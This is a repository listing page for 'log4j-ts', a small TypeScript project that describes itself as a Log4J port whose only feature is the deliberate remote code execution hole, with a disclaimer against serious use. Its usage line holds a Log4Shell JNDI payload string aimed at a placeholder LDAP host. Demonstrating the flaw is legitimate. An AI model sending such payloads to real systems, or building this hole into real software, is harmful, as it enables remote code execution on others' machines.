https://github.com/matteopolak/log4j-ts
This repository is a port of the Log4J library whose only feature is the RCE vulnerability
https://github.com/matteopolak/log4j-ts
Last synced: 27 days ago
JSON representation
This repository is a port of the Log4J library whose only feature is the RCE vulnerability
- Host: GitHub
- URL: https://github.com/matteopolak/log4j-ts
- Owner: matteopolak
- License: mit
- Created: 2021-12-17T15:13:38.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-12-17T15:58:43.000Z (over 3 years ago)
- Last Synced: 2025-02-16T18:46:37.854Z (4 months ago)
- Language: TypeScript
- Size: 6.84 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# log4j-ts
This repository is a port of the Log4J library whose only feature is the RCE vulnerability## Disclaimer
### Do not use this library for any serious purposes. It deliberately contains RCE (Remote Code Execution).## Installation
```console
> yarn install
```## Usage
```console
> npm start -- "${jndi:ldap(s)://example.com}"
```